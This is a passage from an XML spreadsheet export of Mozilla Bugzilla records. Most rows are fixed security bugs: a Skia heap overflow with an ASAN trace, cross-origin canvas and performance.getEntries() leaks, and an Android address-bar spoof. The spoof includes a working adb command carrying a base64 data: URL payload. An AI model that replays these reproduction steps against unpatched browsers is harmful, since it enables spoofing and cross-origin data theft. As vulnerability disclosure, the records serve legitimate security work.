you CAN get the comments.  ValidateBugID() is only called for a single bug.
Try this...
Search for a bunch of bugs, some non-public.
Click on LONG FORMAT
see results
select one bug, view it,  and log out
back up to the LONG FORMAT listing and hit reload...
The tip has this problem.  It is not clear exactly which versions have or do not
have this problem.</t>
        </is>
      </c>
      <c r="X5764" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5765">
      <c r="A5765" t="n">
        <v>1504452</v>
      </c>
      <c r="B5765" t="inlineStr">
        <is>
          <t>2018-11-03 11:53:12 -0700</t>
        </is>
      </c>
      <c r="C5765" t="inlineStr">
        <is>
          <t>heap-buffer-overflow write in add_line</t>
        </is>
      </c>
      <c r="D5765" t="inlineStr">
        <is>
          <t>2024-05-30 09:49:53 -0700</t>
        </is>
      </c>
      <c r="E5765" t="n">
        <v>1</v>
      </c>
      <c r="F5765" t="n">
        <v>1</v>
      </c>
      <c r="G5765" t="n">
        <v>3</v>
      </c>
      <c r="H5765" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5765" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5765" t="inlineStr">
        <is>
          <t>Graphics: Canvas2D</t>
        </is>
      </c>
      <c r="K5765" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5765" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5765" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5765" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5765" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5765" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-esr60.4+]</t>
        </is>
      </c>
      <c r="Q5765" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5765" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5765" t="inlineStr">
        <is>
          <t>mozilla65</t>
        </is>
      </c>
      <c r="T5765" t="n">
        <v>1</v>
      </c>
      <c r="U5765" t="n">
        <v>0</v>
      </c>
      <c r="V5765" t="n">
        <v>24</v>
      </c>
      <c r="W5765" t="inlineStr">
        <is>
          <t>Created attachment 9022386
heap-buffer-overflow-addline-prepare-GrRenderTargetOpListonPrepare.html
Tested on:
OS: Ubuntu 18.04
Firefox:  Downloaded with fuzzfetch:
:$ fuzzfetch --target firefox --os Linux --asan --fuzzing
[2018-11-03 19:51:41] &gt; Task ID: eKR8so7vRgyEkAmBz42SeA
[2018-11-03 19:51:41] &gt; Rank: 1541238293
[2018-11-03 19:51:41] &gt; Changeset: ef27c14b46bf58f710753ae6bb6d2c01a8c3631f
[2018-11-03 19:51:41] &gt; Build ID: 20181103094453
Firefox executed with ffpuppet using prefs.js from: https://github.com/MozillaSecurity/fuzzdata/blob/master/settings/firefox/prefs-default.js
The issue doesn't reproduce without the prefs.js.
To reproduce, use system with at least 8GB of RAM. Original reproducer caused mozalloc_abort with 4GB RAM, I minimized the testcase on a machine with 8GB of RAM.
ASAN-trace:
==94392==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f2f4710c000 at pc 0x7f2f5b3ceb60 bp 0x7fffdcf23b70 sp 0x7fffdcf23b68
WRITE of size 4 at 0x7f2f4710c000 thread T0
    #0 0x7f2f5b3ceb5f in add_line /builds/worker/workspace/build/src/gfx/skia/skia/src/gpu/ops/GrAAHairLinePathRenderer.cpp:695:30
    #1 0x7f2f5b3ceb5f in (anonymous namespace)::AAHairlineOp::onPrepareDraws(GrMeshDrawOp::Target*) /builds/worker/workspace/build/src/gfx/skia/skia/src/gpu/ops/GrAAHairLinePathRenderer.cpp:989
    #2 0x7f2f5b60286c in prepare /builds/worker/workspace/build/src/gfx/skia/skia/src/gpu/ops/GrOp.h:158:49
    #3 0x7f2f5b60286c in GrRenderTargetOpList::onPrepare(GrOpFlushState*) /builds/worker/workspace/build/src/gfx/skia/skia/src/gpu/GrRenderTargetOpList.cpp:112
    #4 0x7f2f5b5ba407 in GrOpList::prepare(GrOpFlushState*) /builds/worker/workspace/build/src/gfx/skia/skia/src/gpu/GrOpList.cpp:88:11
    #5 0x7f2f5b597374 in GrDrawingManager::executeOpLists(int, int, GrOpFlushState*) /builds/worker/workspace/build/src/gfx/skia/skia/src/gpu/GrDrawingManager.cpp:386:17
    #6 0x7f2f5b57d07c in GrDrawingManager::flush(GrSurfaceProxy*, int, GrBackendSemaphore*) /builds/worker/workspace/build/src/gfx/skia/skia/src/gpu/GrDrawingManager.cpp:304:23
    #7 0x7f2f5b5877e4 in GrDrawingManager::prepareSurfaceForExternalIO(GrSurfaceProxy*, int, GrBackendSemaphore*) /builds/worker/workspace/build/src/gfx/skia/skia/src/gpu/GrDrawingManager.cpp:441:24
    #8 0x7f2f5b5fcb2e in GrRenderTargetContext::prepareForExternalIO(int, GrBackendSemaphore*) /builds/worker/workspace/build/src/gfx/skia/skia/src/gpu/GrRenderTargetContext.cpp:1408:36
    #9 0x7f2f51916dbd in mozilla::layers::PersistentBufferProviderBasic::ReturnDrawTarget(already_AddRefed&lt;mozilla::gfx::DrawTarget&gt;) /builds/worker/workspace/build/src/gfx/layers/PersistentBufferProvider.cpp:50:9
    #10 0x7f2f55f61dd2 in mozilla::dom::CanvasRenderingContext2D::ReturnTarget(bool) /builds/worker/workspace/build/src/dom/canvas/CanvasRenderingContext2D.cpp:1949:22
    #11 0x7f2f55f6694c in mozilla::dom::CanvasRenderingContext2D::OnStableState() /builds/worker/workspace/build/src/dom/canvas/CanvasRenderingContext2D.cpp:1550:3
    #12 0x7f2f5606538b in applyImpl&lt;mozilla::dom::CanvasRenderingContext2D, void (mozilla::dom::CanvasRenderingContext2D::*)()&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1191:12
    #13 0x7f2f5606538b in apply&lt;mozilla::dom::CanvasRenderingContext2D, void (mozilla::dom::CanvasRenderingContext2D::*)()&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1197
    #14 0x7f2f5606538b in mozilla::detail::RunnableMethodImpl&lt;mozilla::dom::CanvasRenderingContext2D*, void (mozilla::dom::CanvasRenderingContext2D::*)(), true, (mozilla::RunnableKind)0&gt;::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1242
    #15 0x7f2f4e78fa67 in mozilla::CycleCollectedJSContext::ProcessStableStateQueue() /builds/worker/workspace/build/src/xpcom/base/CycleCollectedJSContext.cpp:366:12
    #16 0x7f2f4e792822 in mozilla::CycleCollectedJSContext::AfterProcessTask(unsigned int) /builds/worker/workspace/build/src/xpcom/base/CycleCollectedJSContext.cpp:431:3
    #17 0x7f2f50c266e5 in XPCJSContext::AfterProcessTask(unsigned int) /builds/worker/workspace/build/src/js/xpconnect/src/XPCJSContext.cpp:1288:30
    #18 0x7f2f4e9d8adf in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1302:24
    #19 0x7f2f4e9e091d in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:530:10
    #20 0x7f2f4fc46eff in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #21 0x7f2f4fb4325e in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:325:10
    #22 0x7f2f4fb4325e in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:318
    #23 0x7f2f4fb4325e in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:298
    #24 0x7f2f58ab94d3 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
    #25 0x7f2f5cee1000 in nsAppStartup::Run() /builds/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:290:30
    #26 0x7f2f5d1afa2e in XREMain::XRE_mainRun() /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4784:22
    #27 0x7f2f5d1b2209 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4929:8
    #28 0x7f2f5d1b3ce3 in XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:5021:21
    #29 0x56184ee2167c in do_main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:237:22
    #30 0x56184ee2167c in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:329
    #31 0x7f2f71aafb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #32 0x56184ed46eec in _start (/dev/shm/firefox/firefox+0x2deec)
0x7f2f4710c000 is located 6144 bytes to the left of 208584-byte region [0x7f2f4710d800,0x7f2f471406c8)
allocated by thread T0 here:
    #0 0x56184edef1b2 in realloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:165:3
    #1 0x56184ee2299d in moz_xrealloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:93:20
    #2 0x7f2f5bcb57fd in makeSpace /builds/worker/workspace/build/src/gfx/skia/skia/include/private/SkPathRef.h:472:46
    #3 0x7f2f5bcb57fd in SkPathRef::growForVerb(int, float) /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathRef.cpp:677
    #4 0x7f2f5bc8a24c in growForVerb /builds/worker/workspace/build/src/gfx/skia/skia/include/private/SkPathRef.h:77:30
    #5 0x7f2f5bc8a24c in SkPath::moveTo(float, float) /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPath.cpp:777
    #6 0x7f2f5454f847 in MoveTo /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/CanvasRenderingContext2D.h:320:21
    #7 0x7f2f5454f847 in mozilla::dom::CanvasRenderingContext2D_Binding::moveTo(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::CanvasRenderingContext2D*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CanvasRenderingContext2DBinding.cpp:4915
    #8 0x379d8f364c74  (&lt;unknown module&gt;)
    #9 0x379d8ef8a4e1  (&lt;unknown module&gt;)
SUMMARY: AddressSanitizer: heap-buffer-overflow /builds/worker/workspace/build/src/gfx/skia/skia/src/gpu/ops/GrAAHairLinePathRenderer.cpp:695:30 in add_line
Shadow bytes around the buggy address:
  0x0fe668e197b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe668e197c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe668e197d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe668e197e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe668e197f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=&gt;0x0fe668e19800:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe668e19810: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe668e19820: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe668e19830: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe668e19840: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe668e1985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94392==ABORTING</t>
        </is>
      </c>
      <c r="X5765" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5766">
      <c r="A5766" t="n">
        <v>798858</v>
      </c>
      <c r="B5766" t="inlineStr">
        <is>
          <t>2012-10-06 23:46:23 -0700</t>
        </is>
      </c>
      <c r="C5766" t="inlineStr">
        <is>
          <t>android.view.ViewRootImpl$CalledFromWrongThreadException: Only the original thread that created a view hierarchy can touch its views. at android.view.ViewRootImpl.checkThread(ViewRootImpl.java) at org.mozilla.gecko.AboutHomeSection.show</t>
        </is>
      </c>
      <c r="D5766" t="inlineStr">
        <is>
          <t>2020-12-21 10:38:46 -0800</t>
        </is>
      </c>
      <c r="E5766" t="n">
        <v>1</v>
      </c>
      <c r="F5766" t="n">
        <v>1</v>
      </c>
      <c r="G5766" t="n">
        <v>6</v>
      </c>
      <c r="H5766" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5766" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J5766" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5766" t="inlineStr">
        <is>
          <t>18 Branch</t>
        </is>
      </c>
      <c r="L5766" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M5766" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N5766" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5766" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5766" t="inlineStr">
        <is>
          <t>[native-crash][startupcrash]</t>
        </is>
      </c>
      <c r="Q5766" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5766" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5766" t="inlineStr">
        <is>
          <t>Firefox 18</t>
        </is>
      </c>
      <c r="T5766" t="n">
        <v>1</v>
      </c>
      <c r="U5766" t="n">
        <v>0</v>
      </c>
      <c r="V5766" t="n">
        <v>12</v>
      </c>
      <c r="W5766" t="inlineStr">
        <is>
          <t>This startup crash is #1 top crasher in today's build. The regression range is:
http://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=2da1f2bde40e&amp;tochange=9f677c2bb33d
It might be a regression from bug 797075.
android.view.ViewRootImpl$CalledFromWrongThreadException: Only the original thread that created a view hierarchy can touch its views.
	at android.view.ViewRootImpl.checkThread(ViewRootImpl.java:4607)
	at android.view.ViewRootImpl.invalidateChildInParent(ViewRootImpl.java:867)
	at android.view.ViewGroup.invalidateChild(ViewGroup.java:4066)
	at android.view.View.invalidate(View.java:10250)
	at android.view.View.setFlags(View.java:8366)
	at android.view.View.setVisibility(View.java:5512)
	at org.mozilla.gecko.AboutHomeSection.show(AboutHomeSection.java:87)
	at org.mozilla.gecko.AboutHomeContent.onQueryTabsComplete(AboutHomeContent.java:625)
	at org.mozilla.gecko.TabsAccessor$2.onPostExecute(TabsAccessor.java:159)
	at org.mozilla.gecko.TabsAccessor$2.onPostExecute(TabsAccessor.java:118)
	at org.mozilla.gecko.util.GeckoAsyncTask$BackgroundTaskRunnable$1.run(GeckoAsyncTask.java:35)
	at android.os.Handler.handleCallback(Handler.java:615)
	at android.os.Handler.dispatchMessage(Handler.java:92)
	at android.os.Looper.loop(Looper.java:137)
	at org.mozilla.gecko.util.GeckoBackgroundThread.run(GeckoBackgroundThread.java:31)
More reports at:
https://crash-stats.mozilla.com/report/list?signature=android.view.ViewRoot%24CalledFromWrongThreadException%3A+Only+the+original+thread+that+created+a+view+hierarchy+can+touch+its+views.+at+android.view.ViewRoot.checkThread%28ViewRoot.java%29
https://crash-stats.mozilla.com/report/list?signature=android.view.ViewRootImpl%24CalledFromWrongThreadException%3A+Only+the+original+thread+that+created+a+view+hierarchy+can+touch+its+views.+at+android.view.ViewRootImpl.checkThread%28ViewRootImpl.java%29</t>
        </is>
      </c>
      <c r="X5766" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5767">
      <c r="A5767" t="n">
        <v>655836</v>
      </c>
      <c r="B5767" t="inlineStr">
        <is>
          <t>2011-05-09 14:27:06 -0700</t>
        </is>
      </c>
      <c r="C5767" t="inlineStr">
        <is>
          <t>Information leakage between canvases and origins [Windows D2D]</t>
        </is>
      </c>
      <c r="D5767" t="inlineStr">
        <is>
          <t>2024-05-29 15:55:37 -0700</t>
        </is>
      </c>
      <c r="E5767" t="n">
        <v>1</v>
      </c>
      <c r="F5767" t="n">
        <v>1</v>
      </c>
      <c r="G5767" t="n">
        <v>3</v>
      </c>
      <c r="H5767" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5767" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5767" t="inlineStr">
        <is>
          <t>Graphics: Canvas2D</t>
        </is>
      </c>
      <c r="K5767" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5767" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5767" t="inlineStr">
        <is>
          <t>Windows Vista</t>
        </is>
      </c>
      <c r="N5767" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5767" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5767" t="inlineStr">
        <is>
          <t>[sg:high][qa!] canvas: CVE-2011-2986, azure: CVE-2011-3649 [inbound]</t>
        </is>
      </c>
      <c r="Q5767" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5767" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5767" t="inlineStr">
        <is>
          <t>mozilla10</t>
        </is>
      </c>
      <c r="T5767" t="n">
        <v>1</v>
      </c>
      <c r="U5767" t="n">
        <v>0</v>
      </c>
      <c r="V5767" t="n">
        <v>64</v>
      </c>
      <c r="W5767" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows NT 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Build Identifier: Mozilla/5.0 (Windows NT 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Information leakage between canvases and origins.
Reproducible: Always
Steps to Reproduce:
1. have a canvasA which is inserted into DOM tree and visible
2. draw green rect onto canvasA
3. have canvasB, which is not inserted into DOM tree
4. draw canvasA onto canvasB
5. draw red rect and different-origin image onto canvasA
A repro implementation is attached.
Actual Results:  
Red rect and different-origin image on canvasB (which has origin-clean flag true) if accessed 'later than immediately' 
Expected Results:  
Green rect and no different-origin image on canvasB (which has origin-clean flag true)
- GPU: GeForce 9650M GT, Driver Version 270.61
- also reproducable in FF4.0
- bug does not occurs when canvasA meets any of the following conditions:
    . is not in DOM tree
    . has css display: none
    . has css visible: hidden
    . has css opacity less than 1 and the canvasA is not (fully?)
        overlayed by another element</t>
        </is>
      </c>
      <c r="X5767" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5768">
      <c r="A5768" t="n">
        <v>1185256</v>
      </c>
      <c r="B5768" t="inlineStr">
        <is>
          <t>2015-07-18 09:28:21 -0700</t>
        </is>
      </c>
      <c r="C5768" t="inlineStr">
        <is>
          <t>performance.getEntries() shows x-domain URLs after a redirect when loading from cache</t>
        </is>
      </c>
      <c r="D5768" t="inlineStr">
        <is>
          <t>2024-05-30 09:03:20 -0700</t>
        </is>
      </c>
      <c r="E5768" t="n">
        <v>1</v>
      </c>
      <c r="F5768" t="n">
        <v>1</v>
      </c>
      <c r="G5768" t="n">
        <v>3</v>
      </c>
      <c r="H5768" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5768" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5768" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5768" t="inlineStr">
        <is>
          <t>39 Branch</t>
        </is>
      </c>
      <c r="L5768" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5768" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5768" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5768" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5768" t="inlineStr">
        <is>
          <t>[adv-main43+][adv-esr38.7+]</t>
        </is>
      </c>
      <c r="Q5768" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5768" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5768" t="inlineStr">
        <is>
          <t>mozilla44</t>
        </is>
      </c>
      <c r="T5768" t="n">
        <v>1</v>
      </c>
      <c r="U5768" t="n">
        <v>0</v>
      </c>
      <c r="V5768" t="n">
        <v>67</v>
      </c>
      <c r="W5768" t="inlineStr">
        <is>
          <t>Created attachment 8635723
PoC code (does not work from file://)
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0
Build ID: 20150630154324
Steps to reproduce:
It is possible to read x-domain URLs after a redirect if the page can be iframed. What I think is a violation of the SOP and could be used to steal sensitive data from several pages.
If http://victim/ redirects to http://victim/?secret an attacker can iframe the first page and obtain the "secret" of the second one.
The exploit abuses what seems a bug in performance.getEntries() when dealing with cached pages.
Details and PoC: http://vwzq.net/lab/xreadurl/
Actual results:
performance.getEntries() contains the destination URL of the redirection after using history.back() and loading the page from browser's cache
Expected results:
performance.getEntries() should show the original URL instead of the redirection's destination</t>
        </is>
      </c>
      <c r="X5768" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5769">
      <c r="A5769" t="n">
        <v>1208525</v>
      </c>
      <c r="B5769" t="inlineStr">
        <is>
          <t>2015-09-25 09:10:59 -0700</t>
        </is>
      </c>
      <c r="C5769" t="inlineStr">
        <is>
          <t>Address bar spoofing with a BOOKMARK shortcut of data: URL</t>
        </is>
      </c>
      <c r="D5769" t="inlineStr">
        <is>
          <t>2024-05-30 09:05:49 -0700</t>
        </is>
      </c>
      <c r="E5769" t="n">
        <v>1</v>
      </c>
      <c r="F5769" t="n">
        <v>1</v>
      </c>
      <c r="G5769" t="n">
        <v>6</v>
      </c>
      <c r="H5769" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5769" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J5769" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5769" t="inlineStr">
        <is>
          <t>44 Branch</t>
        </is>
      </c>
      <c r="L5769" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5769" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5769" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5769" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5769" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main44+]</t>
        </is>
      </c>
      <c r="Q5769" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5769" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5769" t="inlineStr">
        <is>
          <t>Firefox 46</t>
        </is>
      </c>
      <c r="T5769" t="n">
        <v>1</v>
      </c>
      <c r="U5769" t="n">
        <v>0</v>
      </c>
      <c r="V5769" t="n">
        <v>19</v>
      </c>
      <c r="W5769" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.42 Safari/537.36
Steps to reproduce:
1. Load a data: URL from a bookmark shortcut on a home screen
2. The data: URL moves to an other http(s): URL
You can reproduce it by following steps.
1. Close Fennec app at first as a preparation
2. Execute "adb shell" on a console PC that is connected to the device via USB
3. Execute following command that invokes an explicit BOOKMARK intent to the app.
am start -a org.mozilla.gecko.BOOKMARK -d
data:text/html\;base64,UHduPHNjcmlwdD5zZXRUaW1lb3V0KCd3aW5kb3cubG9jYXRpb249YGh0dHBzOi8vd3d3Lmdvb2dsZS5jb21gLDEwMDAnKTwvc2NyaXB0Pg==
-n org.mozilla.fennec/org.mozilla.gecko.BrowserApp
3. A few seconds later, the intent: page is moved to https://www.google.com
Actual results:
Address bar of Fennec doesn't change from data: URL to https://www.google.com  that is shown on Fennec.
Expected results:
https://www.google.com should be shown on an address bar correctly.</t>
        </is>
      </c>
      <c r="X5769" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5770">
      <c r="A5770" t="n">
        <v>229984</v>
      </c>
      <c r="B5770" t="inlineStr">
        <is>
          <t>2004-01-03 13:55:30 -0800</t>
        </is>
      </c>
      <c r="C5770" t="inlineStr">
        <is>
          <t>HTTP download of over 64MB causes disk cache to break</t>
        </is>
      </c>
      <c r="D5770" t="inlineStr">
        <is>
          <t>2007-07-18 03:58:35 -0700</t>
        </is>
      </c>
      <c r="E5770" t="n">
        <v>1</v>
      </c>
      <c r="F5770" t="n">
        <v>1</v>
      </c>
      <c r="G5770" t="n">
        <v>3</v>
      </c>
      <c r="H5770" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5770" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5770" t="inlineStr">
        <is>
          <t>Networking: Cache</t>
        </is>
      </c>
      <c r="K5770" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5770" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5770" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5770" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5770" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5770" t="inlineStr"/>
      <c r="Q5770" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5770" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5770" t="inlineStr">
        <is>
          <t>mozilla1.7beta</t>
        </is>
      </c>
      <c r="T5770" t="n">
        <v>1</v>
      </c>
      <c r="U5770" t="n">
        <v>0</v>
      </c>
      <c r="V5770" t="n">
        <v>39</v>
      </c>
      <c r="W5770" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.6b) Gecko/20040102 Firebird/0.7+
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.6b) Gecko/20040102 Firebird/0.7+
If you download a file that is larger than your max disk cache setting (default
50MB), it can cause the disk cache to be put into an unusable state.   A
cancelled download is not removed from the disk cache.   And if the download is
cancelled after it has reached the max disk cache size, the disk cache will be
permanently disabled.   (Until manually cleared in prefs)
Reproducible: Always
Steps to Reproduce:
1.Start downloading a large file (over 50MB)
2.Cancel the download after it passes 50MB, but before it completes
3.Restart Firebird
4.View a couple of web pages
5.View about:cache
Actual Results:  
Something like this:   (Num of entries is always 0)
Disk cache device
Number of entries: 	0
Maximum storage size: 	50000 k
Storage in use: 	1441792 k
Expected Results:  
The cancelled download should not remain in the disk cache.
The storage in use should be below the max size, and the number of entries
should be more than zero.     (the disk cache should *work*)
I cannot reproduce this with Mozilla builds.   Only Firebird.</t>
        </is>
      </c>
      <c r="X5770" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5771">
      <c r="A5771" t="n">
        <v>880060</v>
      </c>
      <c r="B5771" t="inlineStr">
        <is>
          <t>2013-06-05 16:22:17 -0700</t>
        </is>
      </c>
      <c r="C5771" t="inlineStr">
        <is>
          <t>[fig] Update BaseTest to work with new about:home</t>
        </is>
      </c>
      <c r="D5771" t="inlineStr">
        <is>
          <t>2020-12-21 10:38:46 -0800</t>
        </is>
      </c>
      <c r="E5771" t="n">
        <v>1</v>
      </c>
      <c r="F5771" t="n">
        <v>1</v>
      </c>
      <c r="G5771" t="n">
        <v>6</v>
      </c>
      <c r="H5771" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5771" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J5771" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5771" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5771" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M5771" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N5771" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5771" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5771" t="inlineStr">
        <is>
          <t>fixed-fig</t>
        </is>
      </c>
      <c r="Q5771" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5771" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5771" t="inlineStr">
        <is>
          <t>Firefox 26</t>
        </is>
      </c>
      <c r="T5771" t="n">
        <v>1</v>
      </c>
      <c r="U5771" t="n">
        <v>0</v>
      </c>
      <c r="V5771" t="n">
        <v>14</v>
      </c>
      <c r="W5771" t="inlineStr">
        <is>
          <t>We're getting rid of the AwesomeBar activity in the new about:home, so we need to update our test infrastructure accordingly.</t>
        </is>
      </c>
      <c r="X5771" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5772">
      <c r="A5772" t="n">
        <v>163573</v>
      </c>
      <c r="B5772" t="inlineStr">
        <is>
          <t>2002-08-19 19:02:19 -0700</t>
        </is>
      </c>
      <c r="C5772" t="inlineStr">
        <is>
          <t>CSS problems in bonsai</t>
        </is>
      </c>
      <c r="D5772" t="inlineStr">
        <is>
          <t>2016-06-21 13:34:30 -0700</t>
        </is>
      </c>
